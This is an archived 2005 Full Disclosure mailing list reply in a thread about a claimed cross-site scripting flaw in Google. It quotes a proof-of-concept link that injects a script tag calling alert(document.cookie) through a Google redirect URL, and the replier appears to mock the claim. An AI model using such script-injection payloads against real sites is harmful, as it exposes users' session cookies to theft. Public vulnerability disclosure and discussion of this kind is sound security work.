Full Disclosure mailing list archives
Re: Google is vulnerable from XSS attack
From: "php0t" <very () unprivate com>
Date: Sat, 3 Dec 2005 05:48:54 +0100
Proof of concept: <a class=newlink href="http://www.google.com/url?sa=D&q=http://www.google.com? <script>alert(document.cookie)</script>">
Remarks: This is my second Google disclosure in under a year. That makes two vulnerabilities for Google I have discovered.
Credit: n3td3v
wall ... bad... head .. hurt. ouch. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Google is vulnerable from XSS attack n3td3v (Dec 02)
- Re: Google is vulnerable from XSS attack php0t (Dec 02)
- Re: Google is vulnerable from XSS attack InfoSecBOFH (Dec 03)
- Re: Google is vulnerable from XSS attack n3td3v (Dec 03)
- Re: Google is vulnerable from XSS attack bugtraq (Dec 03)
- Re: Google is vulnerable from XSS attack n3td3v (Dec 04)
- Re: Google is vulnerable from XSS attack ghost (Dec 05)
- Re: Google is vulnerable from XSS attack InfoSecBOFH (Dec 04)
- RE: Google is vulnerable from XSS attack Joseph Pierini (Dec 04)
- Re: Google is vulnerable from XSS attack InfoSecBOFH (Dec 03)
- Re: Google is vulnerable from XSS attack php0t (Dec 02)
- RE: Re: Google is vulnerable from XSS attack Joseph Pierini (Dec 05)
- Re: Re: Google is vulnerable from XSS attack n3td3v (Dec 07)